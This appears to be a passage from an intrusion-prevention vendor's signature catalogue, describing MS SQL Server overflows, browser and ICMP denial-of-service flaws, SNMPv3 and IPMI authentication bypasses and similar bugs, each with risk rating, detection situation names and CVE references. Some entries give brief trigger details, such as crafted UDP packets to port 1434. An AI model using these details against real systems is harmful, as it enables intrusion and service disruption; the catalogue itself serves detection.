MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1081

BID-2030
http://www.securityfocus.com/bid/2030

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Enumresultset-BOF

About this vulnerability:

Buffer overflow using xp_enumresultset procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_enumresultset) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1082

BID-2031
http://www.securityfocus.com/bid/2031

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Peekqueue-BOF

About this vulnerability:

Buffer overflow using xp_peekqueue procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_peekqueue) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1085

BID-2040
http://www.securityfocus.com/bid/2040

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Printstatements-BOF

About this vulnerability:

Buffer overflow using xp_printstatements procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_printstatements) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1086

BID-2041
http://www.securityfocus.com/bid/2041

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Proxiedmetadata-BOF

About this vulnerability:

Buffer overflow using xp_proxiedmetadata procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_proxiedmetadata) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1087

BID-2042
http://www.securityfocus.com/bid/2042

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-SetSQLSecurity-BOF

About this vulnerability:

Buffer overflow using xp_SetSQLSecurity procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_SetSQLSecurity) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1088

BID-2043
http://www.securityfocus.com/bid/2043

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Showcolv-BOF

About this vulnerability:

Buffer overflow using xp_showcolv procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_showcolv) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1083

BID-2038
http://www.securityfocus.com/bid/2038

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-NetBIOS-MS-SQL-Server-Xp-Updatecolvbm-BOF

About this vulnerability:

Buffer overflow using xp_updatecolvbm procedure in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_updatecolvbm) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

References:

CVE-2000-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1084

BID-2039
http://www.securityfocus.com/bid/2039

MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092

MSSQL-Resolution-Service-Stack-Overflow

About this vulnerability:

Stack overflow vulnerability in Microsoft's SQL Server Resolution Service

Risk:

High

First detected in:

sgpkg-ips-43-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2000

Type:

Malfunction

Description:

Microsoft SQL Server Resolution Service is not properly sanitizing remote user input. If an attacker sends a specially crafted request (first byte set to 0x04 followed by a large string), he may be able to execute arbitrary code with the privileges of the SQL server.

Situation:

MSSQL_MS-SQL-Server-Resolution-Service-Stack-Overflow
MSSQL_MS-SQL-Slammer-Worm-Propagation-Attempt

References:

CVE-2002-0649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649

BID-5311
http://www.securityfocus.com/bid/5311

OSVDB-4578
http://www.osvdb.org/4578

MS02-039
http://technet.microsoft.com/security/bulletin/MS02-039

MSSQL-Server-2000-0x08-BOF

About this vulnerability:

Microsoft SQL Server 2000 heap based overflow vulnerability

Risk:

Low

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

The Microsoft SQL Server 2000 has a buffer overflow vulnerability exploitable by sending an UDP packet to port 1434. Remote attackers can either overwrite four bytes of memory or cause an access violation in the SQL server process by sending an UDP packet that begins with 0x08 followed by a long string. The access violation occurs if the submitted string does not end with a colon character (:) and a number.

Situation:

MSSQL_Server-2000-0x08-DoS

References:

CVE-2002-0729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729

MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the CONVERT function in Microsoft SQL Server

Risk:

Moderate

First detected in:

sgpkg-ips-159-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the CONVERT function in Microsoft SQL Server. By sending an SQL statement with a crafted parameter passed to the CONVERT function, a remote authenticated attacker can cause a denial of service terminating the SQL server process or execute arbitarary code with the privileges of the affected process.

Situation:

MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow

References:

CVE-2008-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086

OSVDB-46772
http://www.osvdb.org/46772

MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040

MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of INSERT statements in Microsoft SQL Server

Risk:

Moderate

First detected in:

sgpkg-ips-159-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2005

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of INSERT statements in Microsoft SQL Server. By sending a crafted SQL statement to the vulnerable server, a remote authenticated attacker can cause a denial of service terminating the SQL server process or execute arbitarary code with the privileges of the affected process.

Situation:

MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow

References:

CVE-2008-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106

OSVDB-46770
http://www.osvdb.org/46770

MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040

MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability

About this vulnerability:

A vulnerability in Microsoft SQL Server

Risk:

Moderate

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Malfunction

Description:

There exists a vulnerability in the way Microsoft SQL Server 7.0 handles TDS messages. A series of specially crafted TDS messages can cause stack space exhaustion on a vulnerable server. This vulnerability can be leveraged by a remote attack to cause a denial of service condition.

Situation:

MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability

References:

CVE-2004-1560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1560

BID-11265
http://www.securityfocus.com/bid/11265

MSWebDVD-Class-Null-Pointer-Assignment

About this vulnerability:	A vulnerability in DirectX
Risk:	High
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows XP
Software:	DirectX
Type:	Null Pointer Dereference
Description:	Under certain conditions the MSWebDVD library dereferences a null pointer. This library is included with all versions of Windows XP. The vulnerability is exposed when a specially crafted VBScript or Javascript program is executed, causing the abnormal termination of the process executing the program.
Situation:	File-Text_MSWebDVD-Class-Null-Pointer-Assignment

Mujahideen-Secrets-Key-File

About this vulnerability:	A Moujahedeen Secrets key file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mujahedeen Secrets
Type:	Insecure Configuration
Description:	A Moujahedeen Secrets key file was detected
Situation:	File-Text_Mujahideen-Secrets-Key-File

Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass

About this vulnerability:

Multiple AV Vendor Invalid Archive Checksum Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-684-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Generic Antivirus

Type:

Malfunction

Description:

A vulnerability in multiple antivirus products that allow potentially malformed ZIP files to bypass detection, due to invalid CRC checksum vlaue causing the antivirus to skip scanning of the archive.

Situation:

HTTP_CSU-Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass

References:

BID-12771
http://www.securityfocus.com/bid/12771

Multiple-Browser-Long-Unicode-DoS-Memory-Corruption

About this vulnerability:	Multiple Browser Long Unicode DoS Memory Corruption Vulnerability.
Risk:	High
First detected in:	sgpkg-ips-676-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Generic browser
Type:	Buffer Overflow
Description:	A vulnerability exists in multiple browsers, Windows, which allows remote attackers to cause a denial of service condition by improperly renderring overly-sized unicode strings.
Situation:	File-Text_Multiple-Browser-Long-Unicode-DoS-Memory-Corruption

Multiple-Browser-Marquee-DoS-Memory-Corruption

About this vulnerability:

Multiple Browser Marquee DoS Memory Corruption Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Generic browser

Type:

Buffer Overflow

Description:

A vulnerability exists in multiple browsers, Windows, which allows remote attackers to cause a denial of service condition by overflowing marquee tags.

Situation:

File-Text_Multiple-Browser-Marquee-DoS-Memory-Corruption

References:

CVE-2006-2723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2723

BID-18165
http://www.securityfocus.com/bid/18165

Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

Low

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There is a malformed URI vulnerability that affects various web-browsers. There is insufficient input validation for telnet URI (e.g., telnet://hostname). Namely, the affected products do not validate or filter "-" characters at the beginning of host-names. Telnet software activated by the browsers treat these as command-line options. As such, a malicious attacker may be able to compromise the target machine. Specifically, it may be possible to create or truncate a file on the target system. In a simple exploit case, the vulnerable system creates a file named by telnet's argument. If the file exists on user's file system, it will be overwritten.

Situation:

File-Text_Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability

References:

CVE-2004-0411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411

BID-10358
http://www.securityfocus.com/bid/10358

OSVDB-6107
http://www.osvdb.org/6107

Multiple-DVR-Manufacturers-Configuration-Disclosure

About this vulnerability:

A Multiple DVR Manufacturers Configuration Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP client

Type:

Insecure Configuration

Description:

An insecure configuration vulnerability in multiple DVR manufacturers systems which allows remote attackers to retrieve device configuration information.

Situation:

HTTP_CSU-Multiple-DVR-Manufacturers-Configuration-Disclosure

References:

CVE-2013-1391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1391

BID-57579
http://www.securityfocus.com/bid/57579

Multiple-IPMI-Cipher-Zero-Vulnerabilities

About this vulnerability:

Multiple IPMI Cipher Zero vulnearbilities

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic IPMI interface

Type:

Misconfiguration

Description:

Multiple Intelligent Platform Management Interface (IPMI) implementations have flaws related to the usage of "cipher zero". Cipher zero allows an attacker to authenticate to the IPMI interface using an arbitrary password. The only information that the attacker needs is a valid account name, but most vendors ship with a default 'admin' account.

Situation:

Generic_UDP-IPMI-Cipher-Zero-Mode

References:

OSVDB-93038
http://www.osvdb.org/93038

OSVDB-93039
http://www.osvdb.org/93039

OSVDB-93040
http://www.osvdb.org/93040

Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Mozilla Firefox, Thunderbird and Seamonkey. The vulnerability is due to an error while decoding Ogg Vorbis files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted Ogg Vorbis file, likely embedded in a webpage. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption

References:

CVE-2012-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0444

BID-51753
http://www.securityfocus.com/bid/51753

OSVDB-78739
http://www.osvdb.org/78739

Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in XMLSoft Libxml2

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Libxml2

Type:

Buffer Overflow

Description:

There is a vulnerability in Libxml2, a common library that is used to interpret and generate XML documents. The vulnerability is due to a boundary error in Libxml2, specifically in the way libxml2 handles long XML entity names. The vulnerability allows remote attackers to execute arbitrary code on the vulnerable system in the security context of the logged in user. Remote attackers could exploit this vulnerability by persuading a target user to open a specially crafted XML file. As a result of processing the malicious file a heap-based buffer overflow can be triggered. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. In an attack where code injection is not successful, the affected process terminates abnormally.

Situation:

HTTP_SS-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-TextId_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-Text_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

References:

CVE-2008-3529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529

BID-31126
http://www.securityfocus.com/bid/31126

Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service

About this vulnerability:	A denial of service vulnerability in multiple products
Risk:	High
First detected in:	sgpkg-ips-584-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	RealPlayer; Helix Player
Type:	Input Validation
Description:	There is a denial of service flaw in multiple programs that handle .au files without detecting a divide-by-zero condition.
Situation:	File-Binary_Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service

Multiple-Schneider-Electric-Products-Denial-Of-Service

About this vulnerability:	A vulnerability in multiple Schneider Electric products allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneider Electric
Type:	Malfunction
Description:	A vulnerability exists in multiple Schneider Electric products where an attacker can send custom TCP packets causing a denial of service condition.
Situation:	Generic_CS-Multiple-Schneider-Electric-Products-Denial-Of-Service

Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections

About this vulnerability:

A vulnerability in SolarWinds IP Address Manager

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

SolarWinds Orion IPAM; SolarWinds NetFlow Traffic Analyzer; SolarWinds Network Configuration Manager; SolarWinds Network Performance Monitor (NPM); SolarWinds Server and Application Monitor; SolarWinds User Device Tracker; SolarWinds VoIP and Network Quality Manager; SolarWinds Web Performance Monitor

Type:

SQL Injection

Description:

Multiple SQL injection vulnerabilities have been reported in SolarWinds products which use the Orion management system. These vulnerabilities are due to insufficient validation of certain parameters when processed by GetAccounts(). A remote attacker can exploit these vulnerabilities to inject and execute arbitrary SQL code on the affected system.

Situation:

HTTP_CRL-Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections

References:

CVE-2014-9566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9566

OSVDB-118746
http://www.osvdb.org/118746

Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow

About this vulnerability:

A vulnerability in Apple CUPS

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Apple's Common Unix Printing System (CUPS) distributed by multiple vendors. The vulnerability is due to a boundary error in handling of incoming CGI requests and may be exploited by remote attackers to compromise a vulnerable system or cause denial of service.

Situation:

HTTP_CRL-Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow

References:

CVE-2008-0047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047

BID-28307
http://www.securityfocus.com/bid/28307

Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Solaris 10; Solaris 7; Solaris 8; Solaris 9

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. The resulting behaviour needs to be explored from both sides of the connection. Upon receiving the malicious packet from the attacker the vulnerable host will terminate the TCP connection, thereby destroying the socket used to maintain the connection. No announcement will be send to the other host, the connected host. Therefore the connected host will remain unaware that the connection has been terminated. If the connected host was in the listening mode at the time of the attack it may remain in this mode indefinitely. Alternatively, if it tries to communicate with the vulnerable host, it will receive a TCP RST, since the vulnerable host has already closed the connection and destroyed the socket. Note: Systems using Sun Solaris will not abort an established connection upon receiving the spoofed ICMP error messages. The vendor reports that only a connection in a pre-established state can be interrupted and reset.

Situation:

ICMP_Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service

References:

CVE-2004-0790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790

BID-13124
http://www.securityfocus.com/bid/13124

MS06-064
http://technet.microsoft.com/security/bulletin/MS06-064

MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019

Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 98; Windows ME; Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can reduce the efficiency of the TCP/IP stack of the target system. An remote attacker can exploit this vulnerability to degrade the network performance of the target system.

Situation:

ICMP_Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service

References:

CVE-2004-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060

BID-13124
http://www.securityfocus.com/bid/13124

MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019

Multiple-Vendor-ICMP-Source-Quench-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 98; Windows ME; Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP Source Quench message can reduce the efficiency of the TCP/IP stack of the target system. A remote attacker can exploit this vulnerability to degrade the network performance of the target system.

Situation:

ICMP_Source-Quench-Message

References:

CVE-2004-0791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791

BID-13124
http://www.securityfocus.com/bid/13124

Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow

About this vulnerability:

A vulnerability in libwpd Project WordPerfect Document Importer/Exporter (libwpd)

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libwpd Project WordPerfect Document Importer/Exporter (libwpd); AbiSource AbiWord

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the open source WordPerfect Document Importer/Exporter (libwpd) library. The flaw is due to improper boundary check when processing crafted WordPerfect documents. An attacker can exploit this vulnerability by persuading a victim to open a specially crafted WordPerfect (WPD) document. Successful exploitation of this vulnerability may lead to arbitrary code execution in the context of the currently logged in user.

Situation:

HTTP_SS-Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
File-Binary_Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow

References:

CVE-2007-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0002

BID-23006
http://www.securityfocus.com/bid/23006

Multiple-Vendor-PDF-Reader-Catlog-Handling

About this vulnerability:

A buffer overflow vulnerability in PDF readers from multiple vulnerabilities

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader; Apple Preview

Type:

Buffer Overflow

Description:

There is a vulnerability in Portable Document Format (PDF) readers from multiple vendors. A crafted PDF with a malicious catalog entry can be used to execute code with the privilege of the current user or cause denial of service.

Situation:

HTTP_SS-Multiple-Vendor-PDF-Reader-Catlog-Handling
File-PDF_Multiple-Vendor-PDF-Reader-Catlog-Handling

References:

CVE-2007-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104

BID-21910
http://www.securityfocus.com/bid/21910

Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass

About this vulnerability:

A vulnerability in Net-SNMP

Risk:

High

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Net-SNMP

Type:

Malfunction

Description:

There exists an authentication bypass vulnerability in multiple implementations of SNMPv3 protocol. The vulnerability is caused by improperly handling of HMAC in an authentication message. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted SNMPv3 authentication request to gain unauthorized access to the target system.

Situation:

SNMP-UDP_Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass

References:

CVE-2008-0960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960

BID-29623
http://www.securityfocus.com/bid/29623

Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service

About this vulnerability:

A Multiple Vendor TCP Timestamp Option Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in multiple vendor's TCP stack implementations that allow remote attackers to cause a denial of service attack due to insufficient validation of sequence numbers when updating internal timestamp values.

Situation:

Generic_CS-Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service

References:

CVE-2005-0356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0356

Multiple-Vendors-Agentx-Receive-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Frank Fock AgentX++

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AgentX++

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in multiple products that use the AgentX++ software. The vulnerability is due to a boundary error in AgentX::receive_agentx function. A remote unauthenticated attacker can exploit this vulnerability by sending multiple blocks of data to the target server on port 705/TCP. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server, normally SYSTEM. Code injection that does not result in execution could terminate the application due to memory corruption, and could result in a Denial of Service condition.

Situation:

Generic_CS-Agentx-Receive-Stack-Buffer-Overflow

References:

CVE-2010-1318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1318

BID-39564
http://www.securityfocus.com/bid/39564

Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeBSD Project telnetd

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeBSD Project telnetd;OpenBSD Project telnetd;Red Hat telnetd

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in an implementation of the Telnet daemon, telnetd. This vulnerability was originally reported in FreedBSD's implementation of telnetd, although many related implementations are likely affected, as the source (or a parent's source) has been used as the base of many implementations of telnetd. telnetd is not enabled by default in all contexts. The following implementations are known to be affected: FreeBSD, OpenBSD, Kerberos, and various older versions of Red Hat Linux. The vulnerability is due to the copying of an encryption key into a fixed-length buffer without validation of the key's length. An unauthenticated, remote attacker could exploit this vulnerability by sending a crafted packet to telnetd. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the Telnet daemon.

Situation:

Telnet_CSCS-Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow

References:

CVE-2011-4862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862

BID-51182
http://www.securityfocus.com/bid/51182

OSVDB-78020
http://www.osvdb.org/78020

Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption

About this vulnerability:

A vulnerability in HP-UX

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

HP-UX

